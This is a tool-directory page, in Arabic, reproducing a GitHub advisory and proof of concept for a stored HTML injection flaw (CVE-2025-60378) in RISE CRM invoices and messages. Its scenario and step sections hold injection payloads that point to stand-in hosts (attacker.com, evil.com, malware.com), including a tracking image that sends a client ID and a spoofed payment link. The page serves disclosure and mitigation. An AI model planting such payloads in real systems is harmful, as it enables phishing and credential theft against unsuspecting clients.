Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-60378 — إثبات مفهوم لثغرة حقن HTML مخزّنة في RISE CRM، يوضح كيف يمكن للمستخدمين المصادقين حقن HTML خبيث في الفواتير والرسائل، مما يؤدي إلى التصيد الاحتيالي وتوزيع البرمجيات الخبيثة عبر رسائل البريد الإلكتروني وملفات PDF الآلية. | Kitploit
أدوات/GitHubGitHub/ajansha/cve-2025-60378
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتصيد الاحتياليأمن الويبالتعلم والتعليم
GitHubajansha/cve-2025-60378

CVE-2025-60378

إثبات مفهوم لثغرة حقن HTML مخزّنة في RISE CRM، يوضح كيف يمكن للمستخدمين المصادقين حقن HTML خبيث في الفواتير والرسائل، مما يؤدي إلى التصيد الاحتيالي وتوزيع البرمجيات الخبيثة عبر رسائل البريد الإلكتروني وملفات PDF الآلية.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-60378: حقن HTML مخزّن في RISE Ultimate Project Manager & CRM

⚠️ تنبيه أمني
ثغرة حرجة لحقن HTML المخزّن تؤثر على الفواتير والرسائل والاتصالات الآلية

CVE Severity CVSS Product


📋 نظرة عامة

تم اكتشاف ثغرة حرجة لحقن HTML المخزّن في RISE Ultimate Project Manager & CRM تسمح للمستخدمين المصادق عليهم بحقن HTML خبيث في بنود الفواتير وملاحظات العملاء ووحدات المراسلة. يستمر هذا المحتوى المحقون في قاعدة البيانات ويتم عرضه تلقائيًا في رسائل البريد الإلكتروني وملفات PDF والدردشات الموجهة للعملاء، مما يتيح هجمات تصيد واسعة النطاق، واختراق البريد الإلكتروني للأعمال، وتوزيع البرمجيات الخبيثة عبر البريد الإلكتروني/PDF.

🎯 الإصدارات المتأثرة

  • المنتج: RISE - Ultimate Project Manager & CRM
  • الإصدارات المعرضة للخطر: < 3.9.4
  • الإصدار المُصلَح: 3.9.4+
  • 🔍 تفاصيل الثغرة

    السمةالقيمة
    معرف CVECVE-2025-60378
    النوعحقن HTML مخزّن
    CWECWE-79
    ناقل الهجومالشبكة/عن بُعد
    المصادقةمطلوبة (صلاحيات منخفضة)
    تفاعل المستخدملا شيء
    الخطورةعالية
    CVSS v3.18.1 - عالية
    المكتشفAjansha Shankar

    الوصف

    يفشل RISE CRM في تعقيم وترميز محتوى HTML بشكل صحيح في عدة حقول قابلة للتحرير من قبل المستخدم بما في ذلك الفواتير والرسائل وملاحظات العملاء. عندما يقوم المستخدمون المصادق عليهم بحقن حمولات HTML في هذه الحقول، يتم تخزين المحتوى في قاعدة البيانات دون تصفية كافية. بعد ذلك، يتم عرض هذا HTML الخبيث تلقائيًا في رسائل البريد الإلكتروني وملفات PDF المرفقة ووحدات المراسلة/الدردشة دون ترميز مناسب. تعمل الفواتير المتكررة والمراسلة الآلية على تضخيم الهجوم من خلال توزيع المحتوى الخبيث على عدة مستلمين في وقت واحد.

    المكونات المتأثرة

    • ✗ بنود الفواتير (حقل الوصف)
    • ✗ وحدة ملاحظات/مراسلة العملاء
    • ✗ نظام الدردشة والمراسلة
    • ✗ وحدة إنشاء كشوفات العملاء
    • ✗ نظام البريد الإلكتروني الآلي (الفواتير المتكررة، التذكيرات)
    • ✗ مرفقات PDF

    السبب الجذري

    • ❌ تعقيم غير كافٍ للمدخلات في حقول الفواتير والرسائل وملاحظات العملاء
    • ❌ غياب ترميز مخرجات HTML في قوالب البريد الإلكتروني وتوليد PDF
    • ❌ لا يوجد تحقق من المحتوى قبل التخزين في قاعدة البيانات
    • ❌ عدم وجود قيود على HTML/JavaScript في اتصالات العملاء
    • ❌ الأنظمة الآلية توزع محتوى غير مُتحقق منه دون تصفية إضافية

    💥 التأثير

    الآثار الأمنية

    • 🎣 تصيد واسع النطاق: يمكن للمحتوى المحقون انتحال صفة اتصالات مشروعة وإعادة توجيه عدة عملاء إلى مواقع يتحكم فيها المهاجم
    • 💼 اختراق البريد الإلكتروني للأعمال: الفواتير والرسائل الخبيثة المرسلة إلى العملاء تبدو وكأنها من مصدر موثوق
    • 💬 مراسلة مخترقة: الحمولات الخبيثة في الدردشة/المراسلة تصل إلى أعضاء الفريق والعملاء مباشرة
    • 🦠 توزيع البرمجيات الخبيثة: الروابط أو الإطارات المضمنة الخبيثة توصل البرمجيات الخبيثة عبر البريد الإلكتروني/PDF/المراسلة
    • 🔄 توزيع هجوم آلي: الفواتير المتكررة والرسائل الآلية تضمن وصول الحمولة إلى عدة مستلمين دون تدخل يدوي
    • 👥 هجوم متعدد النواقل: الجمع بين أسطح هجوم البريد الإلكتروني وPDF والمراسلة يزيد من معدل الاختراق الناجح

    تقييم ثالوث CIA

    العاملالتأثيرالشرح
    السرية🔴 عاليةيمكن جمع بيانات اعتماد العملاء والبيانات الحساسة عبر التصيد
    السلامة🔴 عاليةالمحتوى الخبيث يمكن أن يغير تصور الاتصالات والعلاقات التجارية
    التوفر🟡 منخفضتأثير مباشر محدود على توفر النظام

    سيناريوهات الهجوم الواقعية

    السيناريو 1: حملة تصيد قائمة على الفواتير

    يقوم مهاجم بصلاحيات مدير مشروع منخفضة بإنشاء فاتورة تحتوي على HTML خبيث:

    root@kitploit:~
    <a href="https://attacker.com/fake-payment">Click here to view payment status</a>
    

    يتم إرسال الفاتورة إلى أكثر من 100 عميل عبر البريد الإلكتروني الآلي. يتلقى جميع العملاء ما يبدو كفاتورة مشروعة توجههم إلى موقع تصيد. يجمع المهاجم بيانات الاعتماد من عدة ضحايا في وقت واحد.

    السيناريو 2: هجوم قائم على المراسلة

    يقوم مهاجم بحقن HTML خبيث في رسالة عميل:

    root@kitploit:~
    <img src="https://attacker.com/track.gif?user=CLIENT_ID">
    <a href="https://malware.com">Download Updated Project Files</a>
    

    يتلقى جميع أعضاء الفريق والعملاء الرسالة في دردشتهم، وينقرون على الروابط لتنزيل البرمجيات الخبيثة.

    السيناريو 3: توصيل برمجيات خبيثة عبر فواتير متكررة

    يقوم مهاجم بإعداد فاتورة متكررة مع حمولة توصيل برمجيات خبيثة. كل شهر، يتلقى العملاء تلقائيًا فواتير تحتوي على محتوى خبيث مضمّن، مما يوفر ناقل هجوم مستمر.

    🧪 إثبات المفهوم

    إعداد البيئة

    • الوصول إلى لوحة إدارة RISE CRM مع صلاحيات إنشاء الفواتير/الرسائل
    • أي إصدار قبل 3.9.4

    خطوات إثبات المفهوم

    الخطوة 1: الوصول إلى إنشاء الفاتورة أو الرسالة

    root@kitploit:~
    Navigate to: RISE CRM Dashboard → Invoices/Messages → Create New
    

    الخطوة 2: حقن حمولة HTML في حقل الوصف/الرسالة

    root@kitploit:~
    <a href="https://attacker.com">Click here to view invoice</a>
    

    الخطوة 3: إضافة صورة خبيثة مع إعادة توجيه

    root@kitploit:~
    <a href="https://evil.com" target="_blank">
      <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
    </a>
    

    الخطوة 4: إضافة حمولة تنسيق مضللة

    root@kitploit:~
    <h1><font color=red>Visit Our New WebSite</font></h1>
    <h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
    

    الخطوة 5: تكوين التوزيع المتكرر

    • احفظ السجل
    • فعّل خيار "متكرر" (إذا كان متاحًا للفواتير/الرسائل)
    • اضبط التكرار (أسبوعي، شهري، إلخ)
    • يرسل النظام تلقائيًا إلى جميع العملاء المعنيين

    الخطوة 6: التحقق من ناقل الهجوم

    • تحقق من صندوق بريد العميل الإلكتروني
    • تحقق من مراسلة/دردشة العميل
    • افتح مرفق PDF
    • لاحظ عرض HTML الخبيث في جميع القنوات

    النتيجة المتوقعة

    ✅ يتم عرض HTML المحقون في رسائل البريد الإلكتروني وPDF والمراسلة دون ترميز ✅ الروابط قابلة للنقر وتعيد التوجيه إلى مواقع المهاجم ✅ يتم تحميل الصور من خوادم يتحكم فيها المهاجم ✅ يستمر المحتوى في جميع اتصالات العملاء المستقبلية ✅ يصل التوزيع المتكرر إلى عدة مستلمين تلقائيًا

    🛡️ التخفيف

    للمستخدمين النهائيين

    1. ✅ الترقية فورًا: قم بالتحديث إلى RISE CRM v3.9.4 أو أحدث
    2. 🔍 تدقيق جميع السجلات: راجع الفواتير والرسائل وملاحظات العملاء الأخيرة بحثًا عن محتوى HTML مشبوه
    3. ⚠️ إشعار العملاء: نبه جميع العملاء إذا تم إرسال فواتير أو رسائل مشبوهة
    4. 🔄 إعادة تعيين بيانات الاعتماد: أوصِ العملاء بتغيير كلمات المرور إذا نقروا على الروابط
    5. 📝 مراقبة النشاط: تحقق من سجلات التدقيق بحثًا عن تعديلات غير مصرح بها على الفواتير/الرسائل
    6. 🔐 تعطيل التكرار: عطّل الفواتير/الرسائل المتكررة مؤقتًا حتى يتم التصحيح

    📚 المراجع

    • CWE-79: Improper Neutralization of Input During Web Page Generation
    • OWASP: Cross-site Scripting (XSS)
    • OWASP: HTML Injection
    • OWASP: Output Encoding
    • CVE-2025-60378 Official Entry

    📅 الجدول الزمني

    التاريخالحدث
    TBDاكتشاف الثغرة
    TBDإخطار البائع
    TBDتعيين CVE-2025-60378
    TBDإصدار التصحيح (v3.9.4)
    TBDالكشف العام

    👤 الاعتمادات

    اكتشف بواسطة: Ajansha Shankar

    LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

    📊 تقييم CVSS v3.1

    المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

    النتيجة: 8.1 (عالية)

    التفصيل:

    • ناقل الهجوم (AV:N): الشبكة - يمكن استغلالها عن بُعد
    • تعقيد الهجوم (AC:L): منخفض - لا تتطلب شروطًا خاصة
    • الصلاحيات المطلوبة (PR:L): منخفضة - تتطلب مستخدمًا مصادقًا عليه بصلاحيات مدير مشروع أساسية
    • تفاعل المستخدم (UI:N): لا شيء - لا يتطلب تفاعل المستخدم؛ الأنظمة الآلية توزع الحمولة
    • النطاق (S:U): غير متغير - يقتصر التأثير على المكون المعرض للخطر
    • السرية (C:H): عالية - سرقة محتملة لبيانات الاعتماد عبر التصيد لعدة عملاء
    • السلامة (I:H): عالية - يمكن حقن محتوى خبيث وتوصيله إلى عدة مستلمين
    • التوفر (A:N): لا شيء - لا تأثير على توفر النظام

    📧 الاتصال

    للاستفسارات أو معلومات إضافية:

    • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

    ⭐ إذا كان هذا البحث مفيدًا، يرجى التفكير في وضع نجمة على هذا المستودع!

    🔔 ابقَ على اطلاع: تابع هذا المستودع للحصول على تحديثات حول هذا البحث الأمني والأبحاث المستقبلية.

    • CVE-2025-60374 - Stored XSS in Perfex CRM Chatbot
    • CVE-2025-55903 - Stored HTML Injection in Perfex CRM Invoices
    • CVE-2025-60375 - Authentication Bypass in Perfex CRM
    تنزيل الأداة